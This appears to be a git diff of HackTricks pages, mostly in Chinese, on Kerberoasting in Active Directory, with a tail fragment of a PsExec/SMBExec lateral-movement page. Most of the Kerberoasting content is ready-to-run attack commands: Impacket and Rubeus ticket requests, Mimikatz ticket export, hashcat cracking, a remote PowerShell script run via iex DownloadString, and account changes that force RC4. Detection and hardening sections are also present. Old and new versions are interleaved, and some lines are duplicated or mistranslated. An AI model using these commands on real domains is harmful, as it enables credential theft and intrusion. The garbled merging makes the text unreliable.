Kerberoasting 主要集中在获取 TGS 票证,特别是与在 Active Directory (AD) 中以用户帐户运行的服务相关的票证,排除计算机帐户。这些票证的加密使用源自用户密码的密钥,从而允许离线凭证破解。使用用户帐户作为服务的标志是非空的 ServicePrincipalName (SPN) 属性。
|
||||
|
||||
要执行 **Kerberoasting**,需要一个能够请求 **TGS tickets** 的域账户;然而,这个过程并不需要 **特殊权限**,使得任何拥有 **有效域凭证** 的人都可以访问。
|
||||
任何经过身份验证的域用户都可以请求 TGS 票证,因此不需要特殊权限。
|
||||
|
||||
### 关键点:
|
||||
### 关键点
|
||||
|
||||
- **Kerberoasting** 针对 **AD** 中的 **用户账户服务** 的 **TGS tickets**。
|
||||
- 使用 **用户密码** 的密钥加密的票证可以 **离线破解**。
|
||||
- 服务通过 **ServicePrincipalName** 的非空值来识别。
|
||||
- **不需要特殊权限**,只需 **有效域凭证**。
|
||||
|
||||
### **攻击**
|
||||
- 针对以用户帐户运行的服务的 TGS 票证(即,设置了 SPN 的帐户;不是计算机帐户)。
|
||||
- 票证使用源自服务帐户密码的密钥进行加密,可以离线破解。
|
||||
- 不需要提升权限;任何经过身份验证的帐户都可以请求 TGS 票证。
|
||||
|
||||
> [!WARNING]
|
||||
> **Kerberoasting 工具** 通常在执行攻击和发起 TGS-REQ 请求时请求 **`RC4 encryption`**。这是因为 **RC4 是** [**较弱的**](https://www.stigviewer.com/stig/windows_10/2017-04-28/finding/V-63795),并且比其他加密算法如 AES-128 和 AES-256 更容易使用工具如 Hashcat 进行离线破解。\
|
||||
> RC4 (类型 23) 哈希以 **`$krb5tgs$23$*`** 开头,而 AES-256 (类型 18) 以 **`$krb5tgs$18$*`** 开头。\
|
||||
> 此外,请小心,因为 `Rubeus.exe kerberoast` 会自动请求所有易受攻击账户的票证,这会导致被检测。首先,找到具有有趣权限的可 kerberoast 的用户,然后仅对他们运行。
|
||||
```bash
|
||||
> 大多数公共工具更倾向于请求 RC4-HMAC (etype 23) 服务票证,因为它们比 AES 更容易破解。RC4 TGS 哈希以 `$krb5tgs$23$*` 开头,AES128 以 `$krb5tgs$17$*` 开头,AES256 以 `$krb5tgs$18$*` 开头。然而,许多环境正在转向仅使用 AES。不要假设只有 RC4 是相关的。
|
||||
> 此外,避免“喷洒和祈祷”式的烤制。Rubeus 的默认 kerberoast 可以查询并请求所有 SPN 的票证,并且会产生噪音。首先枚举并针对有趣的主体。
|
||||
|
||||
#### **Linux**
|
||||
|
||||
```bash
|
||||
# Metasploit framework
|
||||
msf> use auxiliary/gather/get_user_spns
|
||||
# Impacket
|
||||
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN.FULL>/<USERNAME> -outputfile hashes.kerberoast # 密码将被提示
|
||||
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USERNAME> -outputfile hashes.kerberoast
|
||||
# kerberoast: https://github.com/skelsec/kerberoast
|
||||
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -o kerberoastable # 1. 枚举可kerberoast的用户
|
||||
kerberoast spnroast 'kerberos+password://<DOMAIN.FULL>\<USERNAME>:<PASSWORD>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes # 2. 转储哈希
|
||||
```
|
||||
|
||||
Multi-features tools including a dump of kerberoastable users:
|
||||
|
||||
```bash
|
||||
# ADenum: https://github.com/SecuProject/ADenum
|
||||
adenum -d <DOMAIN.FULL> -ip <DC_IP> -u <USERNAME> -p <PASSWORD> -c
|
||||
```
|
||||
|
||||
#### Windows
|
||||
|
||||
- **Enumerate Kerberoastable users**
|
||||
|
||||
```bash
|
||||
# 获取可Kerberoast的用户
|
||||
setspn.exe -Q */* #这是一个内置的二进制文件。关注用户账户
|
||||
Get-NetUser -SPN | select serviceprincipalname #Powerview
|
||||
.\Rubeus.exe kerberoast /stats
|
||||
```
|
||||
|
||||
- **Technique 1: Ask for TGS and dump it from memory**
|
||||
|
||||
```bash
|
||||
# 从单个用户获取内存中的 TGS
|
||||
Add-Type -AssemblyName System.IdentityModel
|
||||
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ServicePrincipalName" #示例: MSSQLSvc/mgmt.domain.local
|
||||
|
||||
# 获取所有可进行 kerberoast 的账户的 TGS(包括 PC,不太聪明)
|
||||
setspn.exe -T DOMAIN_NAME.LOCAL -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }
|
||||
|
||||
# 列出内存中的 kerberos 票据
|
||||
klist
|
||||
|
||||
# 从内存中提取它们
|
||||
Invoke-Mimikatz -Command '"kerberos::list /export"' #将票据导出到当前文件夹
|
||||
|
||||
# 将 kirbi 票据转换为 john
|
||||
python2.7 kirbi2john.py sqldev.kirbi
|
||||
# 将 john 转换为 hashcat
|
||||
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_file > sqldev_tgs_hashcat
|
||||
```
|
||||
|
||||
- **Technique 2: Automatic tools**
|
||||
|
||||
```bash
|
||||
# Powerview: 获取用户的 Kerberoast 哈希
|
||||
Request-SPNTicket -SPN "<SPN>" -Format Hashcat #使用 PowerView 示例: MSSQLSvc/mgmt.domain.local
|
||||
# Powerview: 获取所有 Kerberoast 哈希
|
||||
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
|
||||
|
||||
# Rubeus
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
|
||||
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast #特定用户
|
||||
.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap #获取管理员
|
||||
|
||||
# Invoke-Kerberoast
|
||||
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
|
||||
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
|
||||
```
|
||||
|
||||
> [!WARNING]
|
||||
> When a TGS is requested, Windows event `4769 - A Kerberos service ticket was requested` is generated.
|
||||
|
||||
### Cracking
|
||||
|
||||
```bash
|
||||
john --format=krb5tgs --wordlist=passwords_kerb.txt hashes.kerberoast
|
||||
hashcat -m 13100 --force -a 0 hashes.kerberoast passwords_kerb.txt
|
||||
./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
|
||||
```
|
||||
|
||||
### Persistence
|
||||
|
||||
If you have **enough permissions** over a user you can **make it kerberoastable**:
|
||||
|
||||
```bash
|
||||
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose
|
||||
```
|
||||
|
||||
You can find useful **tools** for **kerberoast** attacks here: [https://github.com/nidem/kerberoast](https://github.com/nidem/kerberoast)
|
||||
|
||||
If you find this **error** from Linux: **`Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)`** it because of your local time, you need to synchronise the host with the DC. There are a few options:
|
||||
|
||||
- `ntpdate <IP of DC>` - Deprecated as of Ubuntu 16.04
|
||||
- `rdate -n <IP of DC>`
|
||||
|
||||
### Mitigation
|
||||
|
||||
Kerberoasting can be conducted with a high degree of stealthiness if it is exploitable. In order to detect this activity, attention should be paid to **Security Event ID 4769**, which indicates that a Kerberos ticket has been requested. However, due to the high frequency of this event, specific filters must be applied to isolate suspicious activities:
|
||||
|
||||
- The service name should not be **krbtgt**, as this is a normal request.
|
||||
- Service names ending with **$** should be excluded to avoid including machine accounts used for services.
|
||||
- Requests from machines should be filtered out by excluding account names formatted as **machine@domain**.
|
||||
- Only successful ticket requests should be considered, identified by a failure code of **'0x0'**.
|
||||
- **Most importantly**, the ticket encryption type should be **0x17**, which is often used in Kerberoasting attacks.
|
||||
|
||||
```bash
|
||||
获取事件 -FilterHashtable @{Logname='Security';ID=4769} -MaxEvents 1000 | ?{$_.Message.split("`n")[8] -ne 'krbtgt' -and $_.Message.split("`n")[8] -ne '*$' -and $_.Message.split("`n")[3] -notlike '*$@*' -and $_.Message.split("`n")[18] -like '*0x0*' -and $_.Message.split("`n")[17] -like "*0x17*"} | select ExpandProperty message
|
||||
```
|
||||
|
||||
To mitigate the risk of Kerberoasting:
|
||||
|
||||
- Ensure that **Service Account Passwords are difficult to guess**, recommending a length of more than **25 characters**.
|
||||
- Utilize **Managed Service Accounts**, which offer benefits like **automatic password changes** and **delegated Service Principal Name (SPN) Management**, enhancing security against such attacks.
|
||||
|
||||
By implementing these measures, organizations can significantly reduce the risk associated with Kerberoasting.
|
||||
|
||||
## Kerberoast w/o domain account
|
||||
|
||||
In **September 2022**, a new way to exploit a system was brought to light by a researcher named Charlie Clark, shared through his platform [exploit.ph](https://exploit.ph/). This method allows for the acquisition of **Service Tickets (ST)** via a **KRB_AS_REQ** request, which remarkably does not necessitate control over any Active Directory account. Essentially, if a principal is set up in such a way that it doesn't require pre-authentication—a scenario similar to what's known in the cybersecurity realm as an **AS-REP Roasting attack**—this characteristic can be leveraged to manipulate the request process. Specifically, by altering the **sname** attribute within the request's body, the system is deceived into issuing a **ST** rather than the standard encrypted Ticket Granting Ticket (TGT).
|
||||
|
||||
The technique is fully explained in this article: [Semperis blog post](https://www.semperis.com/blog/new-attack-paths-as-requested-sts/).
|
||||
|
||||
> [!WARNING]
|
||||
> You must provide a list of users because we don't have a valid account to query the LDAP using this technique.
|
||||
### 攻击
|
||||
|
||||
#### Linux
|
||||
|
||||
- [impacket/GetUserSPNs.py from PR #1413](https://github.com/fortra/impacket/pull/1413):
|
||||
|
||||
```bash
|
||||
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile "LIST_USERS" -dc-host "dc.domain.local" "domain.local"/
|
||||
```
|
||||
# Metasploit Framework
|
||||
msf> use auxiliary/gather/get_user_spns
|
||||
|
||||
# Impacket — request and save roastable hashes (prompts for password)
|
||||
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER> -outputfile hashes.kerberoast
|
||||
# With NT hash
|
||||
GetUserSPNs.py -request -dc-ip <DC_IP> -hashes <LMHASH>:<NTHASH> <DOMAIN>/<USER> -outputfile hashes.kerberoast
|
||||
# Target a specific user’s SPNs only (reduce noise)
|
||||
GetUserSPNs.py -request-user <samAccountName> -dc-ip <DC_IP> <DOMAIN>/<USER>
|
||||
|
||||
# kerberoast by @skelsec (enumerate and roast)
|
||||
# 1) Enumerate kerberoastable users via LDAP
|
||||
kerberoast ldap spn 'ldap+ntlm-password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -o kerberoastable
|
||||
# 2) Request TGS for selected SPNs and dump
|
||||
kerberoast spnroast 'kerberos+password://<DOMAIN>\\<USER>:<PASS>@<DC_IP>' -t kerberoastable_spn_users.txt -o kerberoast.hashes
|
||||
```
|
||||
多功能工具,包括 kerberoast 检查:
|
||||
```bash
|
||||
# ADenum: https://github.com/SecuProject/ADenum
|
||||
adenum -d <DOMAIN> -ip <DC_IP> -u <USER> -p <PASS> -c
|
||||
```
|
||||
#### Windows
|
||||
|
||||
- [GhostPack/Rubeus from PR #139](https://github.com/GhostPack/Rubeus/pull/139):
|
||||
- 枚举可进行 Kerberoast 的用户
|
||||
```powershell
|
||||
# Built-in
|
||||
setspn.exe -Q */* # Focus on entries where the backing object is a user, not a computer ($)
|
||||
|
||||
```bash
|
||||
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"domain.local" /dc:"dc.domain.local" /nopreauth:"NO_PREAUTH_USER" /spn:"TARGET_SERVICE"
|
||||
# PowerView
|
||||
Get-NetUser -SPN | Select-Object serviceprincipalname
|
||||
|
||||
# Rubeus stats (AES/RC4 coverage, pwd-last-set years, etc.)
|
||||
.\Rubeus.exe kerberoast /stats
|
||||
```
|
||||
- 技术 1:请求 TGS 并从内存中转储
|
||||
```powershell
|
||||
# Acquire a single service ticket in memory for a known SPN
|
||||
Add-Type -AssemblyName System.IdentityModel
|
||||
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>" # e.g. MSSQLSvc/mgmt.domain.local
|
||||
|
||||
## References
|
||||
# Get all cached Kerberos tickets
|
||||
klist
|
||||
|
||||
# Export tickets from LSASS (requires admin)
|
||||
Invoke-Mimikatz -Command '"kerberos::list /export"'
|
||||
|
||||
# Convert to cracking formats
|
||||
python2.7 kirbi2john.py .\some_service.kirbi > tgs.john
|
||||
# Optional: convert john -> hashcat etype23 if needed
|
||||
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$*\1*$\2/' tgs.john > tgs.hashcat
|
||||
```
|
||||
- 技术 2:自动化工具
|
||||
```powershell
|
||||
# PowerView — single SPN to hashcat format
|
||||
Request-SPNTicket -SPN "<SPN>" -Format Hashcat | % { $_.Hash } | Out-File -Encoding ASCII hashes.kerberoast
|
||||
# PowerView — all user SPNs -> CSV
|
||||
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\kerberoast.csv -NoTypeInformation
|
||||
|
||||
# Rubeus — default kerberoast (be careful, can be noisy)
|
||||
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
|
||||
# Rubeus — target a single account
|
||||
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.kerberoast
|
||||
# Rubeus — target admins only
|
||||
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
|
||||
```
|
||||
> [!WARNING]
|
||||
> TGS 请求生成 Windows 安全事件 4769(请求了 Kerberos 服务票证)。
|
||||
|
||||
### OPSEC 和仅 AES 环境
|
||||
|
||||
- 故意请求 RC4 以便于没有 AES 的账户:
|
||||
- Rubeus: `/rc4opsec` 使用 tgtdeleg 枚举没有 AES 的账户并请求 RC4 服务票证。
|
||||
- Rubeus: `/tgtdeleg` 与 kerberoast 一起也会在可能的情况下触发 RC4 请求。
|
||||
- 烤制仅 AES 账户而不是静默失败:
|
||||
- Rubeus: `/aes` 枚举启用了 AES 的账户并请求 AES 服务票证(类型 17/18)。
|
||||
- 如果您已经持有 TGT(PTT 或来自 .kirbi),可以使用 `/ticket:<blob|path>` 与 `/spn:<SPN>` 或 `/spns:<file>` 并跳过 LDAP。
|
||||
- 目标、限流和减少噪音:
|
||||
- 使用 `/user:<sam>`、`/spn:<spn>`、`/resultlimit:<N>`、`/delay:<ms>` 和 `/jitter:<1-100>`。
|
||||
- 使用 `/pwdsetbefore:<MM-dd-yyyy>`(较旧的密码)过滤可能的弱密码,或使用 `/ou:<DN>` 目标特权 OU。
|
||||
|
||||
示例(Rubeus):
|
||||
```powershell
|
||||
# Kerberoast only AES-enabled accounts
|
||||
.\Rubeus.exe kerberoast /aes /outfile:hashes.aes
|
||||
# Request RC4 for accounts without AES (downgrade via tgtdeleg)
|
||||
.\Rubeus.exe kerberoast /rc4opsec /outfile:hashes.rc4
|
||||
# Roast a specific SPN with an existing TGT from a non-domain-joined host
|
||||
.\Rubeus.exe kerberoast /ticket:C:\\temp\\tgt.kirbi /spn:MSSQLSvc/sql01.domain.local
|
||||
```
|
||||
### 破解
|
||||
```bash
|
||||
# John the Ripper
|
||||
john --format=krb5tgs --wordlist=wordlist.txt hashes.kerberoast
|
||||
|
||||
# Hashcat
|
||||
# RC4-HMAC (etype 23)
|
||||
hashcat -m 13100 -a 0 hashes.rc4 wordlist.txt
|
||||
# AES128-CTS-HMAC-SHA1-96 (etype 17)
|
||||
hashcat -m 19600 -a 0 hashes.aes128 wordlist.txt
|
||||
# AES256-CTS-HMAC-SHA1-96 (etype 18)
|
||||
hashcat -m 19700 -a 0 hashes.aes256 wordlist.txt
|
||||
```
|
||||
### 持久性 / 滥用
|
||||
|
||||
如果您控制或可以修改一个账户,您可以通过添加 SPN 使其可进行 kerberoast:
|
||||
```powershell
|
||||
Set-DomainObject -Identity <username> -Set @{serviceprincipalname='fake/WhateverUn1Que'} -Verbose
|
||||
```
|
||||
将帐户降级以启用 RC4 以便于破解(需要对目标对象的写入权限):
|
||||
```powershell
|
||||
# Allow only RC4 (value 4) — very noisy/risky from a blue-team perspective
|
||||
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=4}
|
||||
# Mixed RC4+AES (value 28)
|
||||
Set-ADUser -Identity <username> -Replace @{msDS-SupportedEncryptionTypes=28}
|
||||
```
|
||||
您可以在此处找到用于kerberoast攻击的有用工具:https://github.com/nidem/kerberoast
|
||||
|
||||
如果您在Linux上遇到此错误:`Kerberos SessionError: KRB_AP_ERR_SKEW (Clock skew too great)`,这可能是由于本地时间偏差。请与DC同步:
|
||||
|
||||
- `ntpdate <DC_IP>`(在某些发行版上已弃用)
|
||||
- `rdate -n <DC_IP>`
|
||||
|
||||
### 检测
|
||||
|
||||
Kerberoasting可以是隐蔽的。寻找来自DC的事件ID 4769,并应用过滤器以减少噪音:
|
||||
|
||||
- 排除服务名称`krbtgt`和以`$`结尾的服务名称(计算机帐户)。
|
||||
- 排除来自机器帐户的请求(`*$$@*`)。
|
||||
- 仅成功请求(失败代码`0x0`)。
|
||||
- 跟踪加密类型:RC4(`0x17`),AES128(`0x11`),AES256(`0x12`)。不要仅对`0x17`发出警报。
|
||||
|
||||
示例PowerShell初步分析:
|
||||
```powershell
|
||||
Get-WinEvent -FilterHashtable @{Logname='Security'; ID=4769} -MaxEvents 1000 |
|
||||
Where-Object {
|
||||
($_.Message -notmatch 'krbtgt') -and
|
||||
($_.Message -notmatch '\$$') -and
|
||||
($_.Message -match 'Failure Code:\s+0x0') -and
|
||||
($_.Message -match 'Ticket Encryption Type:\s+(0x17|0x12|0x11)') -and
|
||||
($_.Message -notmatch '\$@')
|
||||
} |
|
||||
Select-Object -ExpandProperty Message
|
||||
```
|
||||
额外的想法:
|
||||
|
||||
- 基于每个主机/用户的正常 SPN 使用情况建立基线;对来自单个主体的大量不同 SPN 请求进行警报。
|
||||
- 标记在 AES 加固域中不寻常的 RC4 使用情况。
|
||||
|
||||
### 缓解 / 加固
|
||||
|
||||
- 对服务使用 gMSA/dMSA 或机器账户。托管账户具有 120+ 字符的随机密码并自动轮换,使离线破解不切实际。
|
||||
- 通过将 `msDS-SupportedEncryptionTypes` 设置为仅 AES(十进制 24 / 十六进制 0x18)来强制服务账户使用 AES,然后轮换密码以派生 AES 密钥。
|
||||
- 在可能的情况下,禁用环境中的 RC4 并监控尝试使用 RC4 的情况。在 DC 上,您可以使用 `DefaultDomainSupportedEncTypes` 注册表值来引导未设置 `msDS-SupportedEncryptionTypes` 的账户的默认值。进行彻底测试。
|
||||
- 从用户账户中删除不必要的 SPN。
|
||||
- 如果托管账户不可行,请使用长且随机的服务账户密码(25+ 字符);禁止常见密码并定期审计。
|
||||
|
||||
### 无域账户的 Kerberoast(AS 请求的 ST)
|
||||
|
||||
在 2022 年 9 月,Charlie Clark 表明,如果主体不需要预身份验证,则可以通过修改请求体中的 sname 来获取服务票证,从而通过精心制作的 KRB_AS_REQ 获取服务票证,实际上获得了服务票证而不是 TGT。这与 AS-REP 烤制相似,并且不需要有效的域凭据。
|
||||
|
||||
详细信息请参见 Semperis 的文章“新攻击路径:AS 请求的 ST”。
|
||||
|
||||
> [!WARNING]
|
||||
> 您必须提供用户列表,因为没有有效凭据,您无法使用此技术查询 LDAP。
|
||||
|
||||
Linux
|
||||
|
||||
- Impacket (PR #1413):
|
||||
```bash
|
||||
GetUserSPNs.py -no-preauth "NO_PREAUTH_USER" -usersfile users.txt -dc-host dc.domain.local domain.local/
|
||||
```
|
||||
Windows
|
||||
|
||||
- Rubeus (PR #139):
|
||||
```powershell
|
||||
Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:domain.local /dc:dc.domain.local /nopreauth:NO_PREAUTH_USER /spn:TARGET_SERVICE
|
||||
```
|
||||
相关
|
||||
|
||||
如果您针对 AS-REP 可烤用户,请参见:
|
||||
|
||||
{{#ref}}
|
||||
asreproast.md
|
||||
{{#endref}}
|
||||
|
||||
## 参考
|
||||
|
||||
- [https://www.tarlogic.com/blog/how-to-attack-kerberos/](https://www.tarlogic.com/blog/how-to-attack-kerberos/)
|
||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/t1208-kerberoasting)
|
||||
- [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberoasting-requesting-rc4-encrypted-tgs-when-aes-is-enabled)
|
||||
- Microsoft Security Blog (2024-10-11) – Microsoft 的指导以帮助减轻 Kerberoasting: https://www.microsoft.com/en-us/security/blog/2024/10/11/microsofts-guidance-to-help-mitigate-kerberoasting/
|
||||
- SpecterOps – Rubeus Roasting 文档: https://docs.specterops.io/ghostpack/rubeus/roasting
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
@ -13,8 +13,8 @@
|
||||
5. 停止服务并清理(删除服务和任何丢弃的二进制文件)。
|
||||
|
||||
要求/前提条件:
|
||||
- 目标上的本地管理员 (SeCreateServicePrivilege) 或目标上的显式服务创建权限。
|
||||
- 可访问 SMB (445) 和可用的 ADMIN$ 共享;通过主机防火墙允许远程服务管理。
|
||||
- 目标上的本地管理员权限 (SeCreateServicePrivilege) 或明确的服务创建权限。
|
||||
- 可访问 SMB (445) 和可用的 ADMIN$ 共享;主机防火墙允许远程服务管理。
|
||||
- UAC 远程限制:使用本地帐户时,令牌过滤可能会阻止网络上的管理员访问,除非使用内置管理员或 LocalAccountTokenFilterPolicy=1。
|
||||
- Kerberos 与 NTLM:使用主机名/FQDN 启用 Kerberos;通过 IP 连接通常会回退到 NTLM(并可能在加固环境中被阻止)。
|
||||
|
||||
@ -64,7 +64,7 @@ OPSEC
|
||||
|
||||
### Impacket psexec.py (类似 PsExec)
|
||||
|
||||
- 使用嵌入式 RemCom 类似服务。通过 ADMIN$ 投放一个临时服务二进制文件(通常是随机名称),创建一个服务(默认通常为 RemComSvc),并通过命名管道代理 I/O。
|
||||
- 使用嵌入式 RemCom 类服务。通过 ADMIN$ 投放一个临时服务二进制文件(通常是随机名称),创建一个服务(默认通常为 RemComSvc),并通过命名管道代理 I/O。
|
||||
```bash
|
||||
# Password auth
|
||||
psexec.py DOMAIN/user:Password@HOST cmd.exe
|
||||
@ -114,7 +114,7 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec
|
||||
- Sysinternals EULA的注册表伪影:HKCU\Software\Sysinternals\PsExec\EulaAccepted=0x1在操作员主机上(如果未被抑制)。
|
||||
|
||||
狩猎思路
|
||||
- 当ImagePath包含cmd.exe /c、powershell.exe或TEMP位置时,对服务安装发出警报。
|
||||
- 对于ImagePath包含cmd.exe /c、powershell.exe或TEMP位置的服务安装发出警报。
|
||||
- 查找父映像为C:\Windows\PSEXESVC.exe或作为LOCAL SYSTEM运行的services.exe子进程的进程创建。
|
||||
- 标记以-stdin/-stdout/-stderr结尾的命名管道或知名的PsExec克隆管道名称。
|
||||
|
||||
@ -124,19 +124,21 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec
|
||||
- Kerberos失败但NTLM被阻止:使用主机名/FQDN连接(而不是IP),确保正确的SPN,或在使用Impacket时提供-k/-no-pass和票证。
|
||||
- 服务启动超时但有效载荷已运行:如果不是实际的服务二进制文件则是预期的;将输出捕获到文件或使用smbexec进行实时I/O。
|
||||
|
||||
## Hardening notes (modern changes)
|
||||
## Hardening notes
|
||||
- Windows 11 24H2和Windows Server 2025默认要求出站(以及Windows 11入站)连接的SMB签名。这不会破坏使用有效凭据的合法PsExec使用,但会防止未签名的SMB中继滥用,并可能影响不支持签名的设备。
|
||||
- 新的SMB客户端NTLM阻止(Windows 11 24H2/Server 2025)可以在通过IP连接或连接到非Kerberos服务器时防止NTLM回退。在强化环境中,这将破坏基于NTLM的PsExec/SMBExec;如果确实需要,请使用Kerberos(主机名/FQDN)或配置例外。
|
||||
- 新的SMB客户端NTLM阻止(Windows 11 24H2/Server 2025)可能会在通过IP连接或连接到非Kerberos服务器时阻止NTLM回退。在强化环境中,这将破坏基于NTLM的PsExec/SMBExec;如果确实需要,请使用Kerberos(主机名/FQDN)或配置例外。
|
||||
- 最小权限原则:最小化本地管理员成员资格,优先使用及时/足够管理员,强制执行LAPS,并监控/警报7045服务安装。
|
||||
|
||||
## See also
|
||||
|
||||
- 基于WMI的远程执行(通常更无文件):
|
||||
|
||||
{{#ref}}
|
||||
./wmiexec.md
|
||||
{{#endref}}
|
||||
|
||||
- 基于WinRM的远程执行:
|
||||
|
||||
{{#ref}}
|
||||
./winrm.md
|
||||
{{#endref}}
|
||||
@ -146,5 +148,6 @@ cme smb HOST -u USER -H NTHASH -x "ipconfig /all" --exec-method smbexec
|
||||
## References
|
||||
|
||||
- PsExec - Sysinternals | Microsoft Learn: https://learn.microsoft.com/sysinternals/downloads/psexec
|
||||
- Windows Server 2025和Windows 11中的SMB安全强化(默认签名,NTLM阻止):https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591
|
||||
- Windows Server 2025和Windows 11中的SMB安全强化(默认签名,NTLM阻止): https://techcommunity.microsoft.com/blog/filecab/smb-security-hardening-in-windows-server-2025--windows-11/4226591
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
Loading…
x
Reference in New Issue
Block a user